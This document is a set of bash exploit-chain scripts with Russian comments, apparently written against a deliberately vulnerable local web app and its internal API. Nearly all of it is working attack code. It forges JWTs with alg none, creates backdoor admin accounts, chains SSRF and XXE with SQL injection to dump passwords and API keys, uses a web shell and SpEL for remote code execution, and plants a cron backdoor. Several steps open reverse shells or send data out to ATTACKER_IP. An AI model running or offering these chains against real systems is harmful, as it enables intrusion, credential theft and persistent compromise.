Полные цепочки эксплуатации              ?

Chain 2: JWT Forgery → Mass Assignment → Privilege Escalation


#!/bin/bash
echo "========================================="
echo "CHAIN 2: JWT → Mass Assignment → Privesc"
echo "========================================="

BASE="http://localhost:8080"

# Шаг 1: Создание поддельного JWT
echo "[1/5] Создание поддельного JWT..."
HEADER=$(echo -n '{"alg":"none","typ":"JWT"}' | base64 | tr -d '=' | tr '/+' '_-')
PAYLOAD=$(echo -n '{"sub":"superadmin","role":"ROLE_ADMIN","admin":true,"email":"superadmin@internal.company.com"}' | base64 | tr -d '=' | tr '/+' '_-')
FORGED="${HEADER}.${PAYLOAD}."
echo "Token: $FORGED"

# Шаг 2: Проверка токена
echo -e "\n[2/5] Проверка токена..."
curl -s "http://localhost:8080/api/auth/debug/token-info" -H "Authorization: Bearer $FORGED" | jq .

# Шаг 3: Создание backdoor админа
echo -e "\n[3/5] Создание backdoor админа..."
curl -s -X POST "http://localhost:8080/api/admin/users/create" \
  -H "Authorization: Bearer $FORGED" \
  -H "Content-Type: application/json" \
  -d '{"username":"backdoor","email":"backdoor@evil.com","password":"Evil123!","admin":true,"is_admin":true}' | jq .

# Шаг 4: Повышение john.doe до админа
echo -e "\n[4/5] Повышение john.doe..."
curl -s -X PUT "http://localhost:8080/api/admin/users/2/update" \
  -H "Authorization: Bearer $FORGED" \
  -H "Content-Type: application/json" \
  -d '{"admin":true,"is_admin":true}' | jq .

# Шаг 5: Проверка - логин нового админа
echo -e "\n[5/5] Проверка нового админа..."
curl -s -X POST "http://localhost:8080/api/auth/login" \
  -d "username=backdoor&password=Evil123!" | jq .

echo -e "\n[+] Chain 2 завершен! Backdoor admin создан."



----------------------------------

Chain 3: SSRF → Internal API → RCE

#!/bin/bash
echo "========================================="
echo "CHAIN 3: SSRF → Internal API → RCE"
echo "========================================="

BASE="http://localhost:8080"
INTERNAL="http://internal-api:8081"

# Шаг 1: SSRF - доступ к Internal API                                             +
echo "[1/6] SSRF: Доступ к Internal API..."
curl -s -X POST "http://localhost:8080/api/users/import-profile" \
  -d "url=http://localhost:8081/api/internal/users/all" | jq '. | length'

# Шаг 2: SSRF + SQLi через Internal API
echo -e "\n[2/6] SSRF+SQLi: Извлечение superadmin..."
curl -s -X POST "http://localhost:8080/api/users/import-profile" \
  -d "url=http://localhost:8081/api/internal/users/by-username/superadmin" | jq .

# Шаг 4: Чтение файлов через Internal API
echo -e "\n[4/6] Чтение application.yml..."
curl -s -X POST "http://localhost:8080/api/users/import-profile" \
  -d "url=http://localhost:8081/api/internal/files/process" \
  -H "Content-Type: text/plain" \
  -d "/app/application.yml"

# Шаг 5: Получение environment через actuator
echo -e "\n[5/6] Получение env variables..."
curl -s -X POST "http://localhost:8080/api/users/import-profile" \
  -d "url=http://localhost:8081/actuator/env" | jq 'keys'

# Шаг 6: Reverse shell через Internal API
echo -e "\n[6/6] Reverse shell (замените ATTACKER_IP)..."
curl -s -X POST "http://localhost:8080/api/users/import-profile" \
  -d "url=http://localhost:8081/api/internal/files/execute-command?cmd=bash -c 'bash -i >%26 /dev/tcp/ATTACKER_IP/4444 0>%261'"

echo -e "\n[+] Chain 3 завершен!"



---------------------------------

Chain 4: XXE → SSRF → Data Exfiltration

#!/bin/bash
echo "========================================="
echo "CHAIN 4: XXE → SSRF → Data Exfil"
echo "========================================="

BASE="http://localhost:8080"
INTERNAL="http://internal-api:8081"

# Шаг 1: XXE - чтение конфигурации
echo "[1/5] XXE: Чтение application.yml..."
curl -s -X POST "http://localhost:8080/api/xml/import" \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///app/application.yml">]><data>&xxe;</data>'

# Шаг 2: XXE + SSRF к Internal API
echo -e "\n[2/5] XXE+SSRF: Все пользователи..."
curl -s -X POST "http://localhost:8080/api/xml/import" \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "'http://localhost:8081'/api/internal/users/all">]><data>&xxe;</data>'

# Шаг 3: XXE + SSRF + SQLi
echo -e "\n[3/5] XXE+SSRF+SQLi: Пароли..."
curl -s -X POST "http://localhost:8080/api/xml/import" \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "'http://localhost:8081'/api/internal/users/search?name=%27%20UNION%20SELECT%20username,%20password,%20email,%20is_admin::text,%20api_key%20FROM%20users--">]><data>&xxe;</data>'

# Шаг 4: XSLT для SSRF
echo -e "\n[4/5] XSLT Injection..."
curl -s -X POST "http://localhost:8080/api/xml/transform" \
  -d "xml=<root/>xslt=<?xml version=\"1.0\"?><xsl:stylesheet xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\"><xsl:template match=\"/\"><xsl:copy-of select=\"document('http://localhost:8081/api/internal/tasks/all')\"/></xsl:template></xsl:stylesheet>"

# Шаг 5: DTD Injection
echo -e "\n[5/5] DTD Injection..."
curl -s -X POST "http://localhost:8080/api/xml/validate" \
  -d "xml=<root><data>test</data></root>dtd=<!ENTITY % file SYSTEM \"file:///etc/hostname\"><!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'http://localhost:8081/api/internal/files/execute-command?cmd=hostname'>\">%eval;%exfil;"

echo -e "\n[+] Chain 4 завершен!"



----------------------------------------------

Chain 5: File Upload → Web Shell → Reverse Shell

#!/bin/bash
echo "========================================="
echo "CHAIN 5: Upload → WebShell → ReverseShell"
echo "========================================="

BASE="http://localhost:8080"

# Шаг 1: Тест web shell
echo "[1/5] Тест web shell..."
curl -s "http://localhost:8080/api/upload/shell?cmd=id"

# Шаг 2: Загрузка скрипта
echo -e "\n[2/5] Загрузка reverse shell скрипта..."
curl -s -X POST "http://localhost:8080/api/upload/script" \
  -F "script=@-;filename=revshell.sh" \
  -F "interpreter=bash" <<< "#!/bin/bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &"

# Шаг 3: Прямой reverse shell
echo -e "\n[3/5] Прямой reverse shell..."
curl -s -X POST "http://localhost:8080/api/upload/reverse-shell" \
  -d "command=nohup bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' &"

# Шаг 4: Upload and execute
echo -e "\n[4/5] Upload + execute..."
curl -s -X POST "http://localhost:8080/api/upload/upload-and-execute" \
  -F "file=@-;filename=payload.sh" \
  -F "execCommand=chmod +x {FILE} && {FILE}" <<< "#!/bin/bash
curl http://ATTACKER_IP:8080/\$(hostname)/\$(whoami)"

# Шаг 5: SpEL RCE как запасной вариант
echo -e "\n[5/5] SpEL RCE..."
curl -s -X POST "http://localhost:8080/api/templates/expression" \
  -H "Content-Type: text/plain" \
  -d 'exec:curl http://ATTACKER_IP:8080/$(hostname)/$(id)|base64'

echo -e "\n[+] Chain 5 завершен! Проверьте listener: nc -lvnp 4444"


-----------------------------------------

Chain 6: Полная цепочка (Full Chain)

#!/bin/bash
echo "========================================="
echo "FULL CHAIN: Полная компрометация"
echo "========================================="

BASE="http://localhost:8080"
INTERNAL="http://internal-api:8081"

# Фаза 1: Разведка через SQLi
echo "[Phase 1: Reconnaissance]"
echo "[1/10] SQLi: Извлечение пользователей..."
USERS=$(curl -s -H "X-Forwarded-For: 127.0.0.1" \
  "http://localhost:8080/api/users/search?name=' UNION SELECT username, email, password, is_admin::text, api_key FROM users--")
echo "$USERS" | jq '[.users[]? | {username: .[0], password: .[2], admin: .[3]}]'

# Фаза 2: SSRF к Internal API
echo -e "\n[Phase 2: Internal Access]"
echo "[2/10] SSRF: Доступ к Internal API..."
curl -s -X POST "http://localhost:8080/api/users/import-profile" \
  -d "url=http://localhost:8081/api/internal/users/all" | jq '. | length'

# Фаза 3: JWT Forgery
echo -e "\n[Phase 3: Auth Bypass]"
echo "[3/10] JWT: Создание admin токена..."
HEADER=$(echo -n '{"alg":"none","typ":"JWT"}' | base64 | tr -d '=' | tr '/+' '_-')
PAYLOAD=$(echo -n '{"sub":"admin","role":"ROLE_ADMIN","admin":true}' | base64 | tr -d '=' | tr '/+' '_-')
ADMIN_TOKEN="${HEADER}.${PAYLOAD}."

# Фаза 4: Privilege Escalation
echo -e "\n[Phase 4: Privilege Escalation]"
echo "[4/10] Mass Assignment: Создание backdoor..."
curl -s -X POST "http://localhost:8080/api/admin/users/create" \
  -H "Authorization: Bearer $ADMIN_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"username":"system_backdoor","email":"system@backdoor.local","password":"SysBack2024!","admin":true,"is_admin":true}' | jq .

# Фаза 5: Data Exfiltration
echo -e "\n[Phase 5: Data Exfiltration]"
echo "[5/10] SQLi: Дамп всех данных..."
curl -s -H "X-Forwarded-For: 127.0.0.1" \
  "http://localhost:8080/api/users/search?name=' UNION SELECT service_name, api_key, 'a', 'b', 'c' FROM api_keys--" | jq .

echo "[6/10] SpEL: Environment variables..."
curl -s -X POST "http://localhost:8080/api/templates/expression" \
  -H "Content-Type: text/plain" \
  -d 'T(java.lang.System).getenv()' | grep -E "(KEY|SECRET|PASS)"

# Фаза 6: Persistence
echo -e "\n[Phase 6: Persistence]"
echo "[7/10] Web Shell доступ..."
curl -s "http://localhost:8080/api/upload/shell?cmd=echo%20persistence%20check"

echo "[8/10] Создание cron задачи..."
curl -s "http://localhost:8080/api/upload/shell?cmd=echo%20'*/5%20*%20*%20*%20*%20curl%20http://ATTACKER_IP/ping'%20>/tmp/cron_backdoor"

# Фаза 7: RCE
echo -e "\n[Phase 7: Remote Code Execution]"
echo "[9/10] SpEL RCE..."
curl -s -X POST "http://localhost:8080/api/templates/expression" \
  -H "Content-Type: text/plain" \
  -d 'exec:id'

echo "[10/10] Internal API RCE..."
curl -s -X POST "http://localhost:8080/api/users/import-profile" \
  -d "url=http://localhost:8081/api/internal/files/execute-command?cmd=id"

echo -e "\n[+] Full Chain завершен!"
echo "    Backdoor: system_backdoor / SysBack2024!"
echo "    Web Shell: http://localhost:8080/api/upload/shell?cmd=<command>"
echo "    Admin Token: $ADMIN_TOKEN"




----------------------------------


13. Быстрые проверки


# Проверка всех уязвимостей одной командой
echo "=== QUICK VULN CHECK ==="

echo -n "WAF Bypass: "
curl -s -o /dev/null -w "%{http_code}" -H "X-Forwarded-For: 127.0.0.1" "http://localhost:8080/api/users/search?name=' OR '1'='1"
echo " (200 = уязвим)"

echo -n "SSRF: "
curl -s -o /dev/null -w "%{http_code}" -X POST "http://localhost:8080/api/users/import-profile" -d "url=file:///etc/hostname"
echo " (200 = уязвим)"

echo -n "Path Traversal: "
curl -s -o /dev/null -w "%{http_code}" "http://localhost:8080/api/files/read?filename=../../../etc/hostname"
echo " (200 = уязвим)"

echo -n "JWT Forgery: "
HEADER=$(echo -n '{"alg":"none","typ":"JWT"}' | base64 | tr -d '=')
PAYLOAD=$(echo -n '{"sub":"admin","role":"ROLE_ADMIN"}' | base64 | tr -d '=')
curl -s -o /dev/null -w "%{http_code}" "http://localhost:8080/api/auth/debug/token-info" -H "Authorization: Bearer $HEADER.$PAYLOAD."
echo " (200 = уязвим)"

echo -n "SpEL RCE: "
curl -s -o /dev/null -w "%{http_code}" -X POST "http://localhost:8080/api/templates/expression" -H "Content-Type: text/plain" -d "exec:id"
echo " (200 = уязвим)"

echo -n "Web Shell: "
curl -s -o /dev/null -w "%{http_code}" "http://localhost:8080/api/upload/shell?cmd=id"
echo " (200 = уязвим)"

echo -n "XXE: "
curl -s -o /dev/null -w "%{http_code}" -X POST "http://localhost:8080/api/xml/import" -H "Content-Type: application/xml" -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><data>&xxe;</data>'
echo " (200 = уязвим)"

echo -n "Actuator: "
curl -s -o /dev/null -w "%{http_code}" "http://localhost:8080/actuator/env"
echo " (200 = уязвим)"



---------------------------------















